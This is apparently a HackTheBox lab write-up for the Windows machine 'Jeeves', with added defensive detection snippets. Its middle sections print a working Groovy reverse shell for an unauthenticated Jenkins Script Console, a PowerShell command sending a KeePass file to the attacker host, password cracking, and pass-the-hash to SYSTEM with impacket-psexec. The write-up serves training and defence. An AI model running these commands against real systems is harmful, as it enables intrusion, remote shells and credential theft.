
HackTheBox - Jeeves Writeup | Windows Medium

Introduction

Jeeves is a Windows machine that chains together several real-world attack techniques: an unauthenticated Jenkins Script Console providing code execution, a KeePass password database left on disk, and an NTFS Alternate Data Stream used to hide the final flag. Every step reflects scenarios encountered in penetration tests.

Attack Overview

  • Port 50000 (Jetty)
  • Fuzzing reveals /askjeeves
  • Jenkins dashboard (no authentication)
  • Script Console → Groovy RCE
  • Reverse shell as kohsuke (SeImpersonatePrivilege)
  • CEH.kdbx found in Documents
  • John the Ripper cracks master password "moonshine1"
  • NTLM hash extracted from KeePass
  • Pass-the-Hash (impacket-psexec)
  • NT AUTHORITY\SYSTEM
  • Root flag hidden in NTFS ADS

Initial Enumeration

A full port scan reveals four open ports:

Port        Service   Version
80/tcp      HTTP      Microsoft IIS 10.0
135/tcp     MSRPC     Windows RPC
445/tcp     SMB       Windows 7–10
50000/tcp   HTTP      Jetty 9.4.z-SNAPSHOT

Observations from the scan output:

  • SMB signing is disabled.
  • The machine name is JEEVES running Windows 10 Pro build 10586.
  • Port 50000 returns a 404 Not Found from a Jetty server.

Web Enumeration

Visiting http://10.129.228.112 shows an “Ask Jeeves” search engine parody page. Directory fuzzing finds only index.html and error.html. This page is a decoy.

Fuzzing port 50000 reveals a hidden path:

ffuf -u http://10.129.228.112:50000/FUZZ \
     -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -t 50

Result: /askjeeves returns a 302 redirect. Navigating to http://10.129.228.112:50000/askjeeves exposes a Jenkins dashboard with no authentication required.

Jenkins Script Console RCE

Jenkins provides a Script Console (/script) for administrators to run arbitrary Groovy code on the server. With no authentication, any visitor can execute OS commands.

A Groovy reverse shell is prepared:

String host="10.10.14.165";
int port=4443;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();po.flush();Thread.sleep(50);
    try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();s.close();

A listener is set up:

ncat -lvnp 4443

After clicking Run in Jenkins, a shell is received:

Ncat: Connection from 10.129.228.112:49676.
Microsoft Windows [Version 10.0.10586]
C:\Users\Administrator\.jenkins>

User Access

The user flag is retrieved:

cd C:\Users\kohsuke\Desktop
type user.txt
[redacted]

Post-Exploitation Enumeration

Checking privileges:

whoami /all

SeImpersonatePrivilege is enabled. Attempts with JuicyPotato and PrintSpoofer fail on this Windows build. The user’s Documents folder contains a KeePass database:

dir C:\Users\kohsuke\Documents
09/18/2017  01:43 PM             2,846 CEH.kdbx

KeePass Cracking

The file is transferred to the attacker machine:

powershell -c "Invoke-WebRequest -Uri 'http://10.10.14.165:8000/' -Method POST -InFile CEH.kdbx"

The KeePass master password hash is extracted and cracked:

keepass2john CEH.kdbx > keepass.hash
john --wordlist=/usr/share/wordlists/rockyou.txt keepass.hash

Output:

moonshine1       (CEH)

Opening the database reveals several entries, including one labeled “Backup stuff” containing an NTLM hash:

aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

Privilege Escalation with Pass-the-Hash

The NTLM hash is used to authenticate as Administrator without cracking it:

netexec smb 10.129.228.112 -u Administrator \
  -H aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

Output: [+] Jeeves\Administrator:e0fb1fb85756c24235ff238cbe81fe00 (Pwn3d!)

A SYSTEM shell is obtained using impacket-psexec:

impacket-psexec administrator@10.129.228.112 \
  -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
[*] Found writable share ADMIN$
[*] Uploading file uCXayOup.exe
[*] Creating service nDqH
[*] Starting service nDqH...
Microsoft Windows [Version 10.0.10586]
C:\Windows\system32>
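From the defender's side, the psexec run above leaves a characteristic trace in the System event log: Event ID 7045 ("A service was installed in the system") for a service with a random four-letter name whose binary is a random eight-letter .exe written through the ADMIN$ share. The following Python is an added example, not part of the writeup or of Impacket, that runs that rule over a few constructed 7045 records. The nDqH / uCXayOup.exe pair is taken from the output above; the other records are made up for contrast. The field names are those of a normalised event as a SIEM might expose them, and the exact form of the image path is an assumption.

```python
import re

# Constructed System-log records reduced to the fields a SIEM would normalise.
# Record 0 mirrors the service created by the psexec session above; records 1-2
# are benign installs; record 3 is a 7036 state change that must not fire.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "nDqH", "ImagePath": r"%systemroot%\uCXayOup.exe",
     "StartType": "demand start", "AccountName": "LocalSystem", "Computer": "JEEVES"},
    {"EventID": 7045, "ServiceName": "Sysmon64", "ImagePath": r"C:\Windows\Sysmon64.exe",
     "StartType": "auto start", "AccountName": "LocalSystem", "Computer": "JEEVES"},
    {"EventID": 7045, "ServiceName": "MyAgentSvc", "ImagePath": r"C:\Program Files\Agent\agent.exe",
     "StartType": "auto start", "AccountName": "LocalSystem", "Computer": "JEEVES"},
    {"EventID": 7036, "ServiceName": "nDqH", "ImagePath": "",
     "StartType": "", "AccountName": "", "Computer": "JEEVES"},
]

# A four-letter service name plus an eight-letter .exe dropped directly into
# %SystemRoot% (the ADMIN$ share) is the shape psexec-style tooling leaves
# behind. Real services almost never combine both traits.
RANDOM_SERVICE_NAME = re.compile(r"^[A-Za-z]{4}$")
RANDOM_BINARY = re.compile(r"^(?:%systemroot%|c:\\windows)\\[A-Za-z]{8}\.exe$", re.IGNORECASE)


def is_psexec_like_install(event):
    """True when a 7045 record has the random-name, ADMIN$-dropped, on-demand shape."""
    if event.get("EventID") != 7045:
        return False
    image = event.get("ImagePath", "").strip().strip('"')
    return (RANDOM_SERVICE_NAME.match(event.get("ServiceName", "")) is not None
            and RANDOM_BINARY.match(image) is not None
            and event.get("StartType", "").lower() == "demand start")


def find_psexec_like_installs(events):
    """Return every record that matches the rule, in log order."""
    return [e for e in events if is_psexec_like_install(e)]


if __name__ == "__main__":
    for hit in find_psexec_like_installs(SAMPLE_EVENTS):
        print(f"{hit['Computer']}: service {hit['ServiceName']} -> {hit['ImagePath']}")
```

The rule is deliberately narrow so it can page someone; a broader companion query (any 7045 whose image path is not under System32 or Program Files) is the usual hunting follow-up. Pairing the alert with a 4624 logon of type 3 from the same source, authenticated with NTLM, ties it back to the pass-the-hash step.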

Root Flag in NTFS Alternate Data Stream

The root flag is not stored as a regular file on the Administrator’s desktop. The /r switch of dir lists NTFS alternate data streams next to the files that carry them:

dir /a /r C:\Users\Administrator\Desktop

Output:

                              36 hm.txt
                              34 hm.txt:root.txt:$DATA

The flag is read from the alternate data stream:

more < hm.txt:root.txt:$DATA
[redacted]
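For incident responders, the listing above is a format to parse rather than read by eye. The following Python is an added example (not part of the original writeup) that extracts every file:stream:$DATA entry from dir /a /r output, then drops the Zone.Identifier stream Windows attaches to downloaded files so that only unexpected streams remain. The dir output it runs on is constructed to match the listing above plus one benign download.

```python
import re

# Constructed dir /a /r output: the hm.txt file and its root.txt stream from the
# listing above, plus a downloaded archive carrying the usual Zone.Identifier.
SAMPLE_DIR_OUTPUT = r"""
 Directory of C:\Users\Administrator\Desktop

11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  09:32 AM             3,521 tool.zip
                                    26 tool.zip:Zone.Identifier:$DATA
               2 File(s)          3,557 bytes
"""

# A stream line is indented (no date column), then a size with optional
# thousands separators, then <file>:<stream>:$DATA. Ordinary file lines start
# with a date and therefore never match.
STREAM_LINE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:]+):\$DATA\s*$")

# Streams Windows itself writes that are normally not worth an alert.
BENIGN_STREAMS = {"Zone.Identifier"}


def parse_ads(dir_output):
    """Return [(file, stream, size_bytes)] for every alternate data stream listed."""
    streams = []
    for line in dir_output.splitlines():
        m = STREAM_LINE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            streams.append((m.group(2), m.group(3), size))
    return streams


def suspicious_ads(dir_output):
    """Drop well-known benign streams; whatever remains deserves a closer look."""
    return [s for s in parse_ads(dir_output) if s[1] not in BENIGN_STREAMS]


if __name__ == "__main__":
    for name, stream, size in suspicious_ads(SAMPLE_DIR_OUTPUT):
        print(f"{name}:{stream} ({size} bytes)")
```

The same check can be fed from PowerShell's Get-Item -Stream * output or from a Sysmon file-stream event; dir /r is simply the lowest-common-denominator source available on any Windows host.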

Key Takeaways

  • Jenkins exposed without authentication
    Root cause: Script Console accessible to unauthenticated users
    Remediation: Enforce authentication; restrict the Script Console to administrators; never expose Jenkins to the internet
  • KeePass database stored on disk with a weak master password
    Root cause: Master password moonshine1 cracked via rockyou.txt
    Remediation: Use strong, unique master passwords; restrict access to .kdbx files
  • NTLM hash stored in plaintext inside KeePass
    Root cause: Raw hash stored as a password entry
    Remediation: Treat NTLM hashes as sensitive as plaintext passwords; avoid storing them in password managers without additional protection
  • Pass-the-Hash allowed remote SYSTEM access
    Root cause: NTLM authentication without SMB signing
    Remediation: Enable SMB signing; disable NTLM where possible
  • Root flag hidden in an NTFS ADS
    Root cause: Lack of visibility into alternate data streams
    Remediation: Use dir /r during incident response; monitor for ADS creation

Resources

  • Nmap — Network discovery and port scanning
  • ffuf — Web directory fuzzing tool
  • John the Ripper — Password hash cracking
  • keepass2john — Extract KeePass master password hash
  • netexec — SMB authentication testing
  • Impacket — Network protocols toolkit (psexec implementation)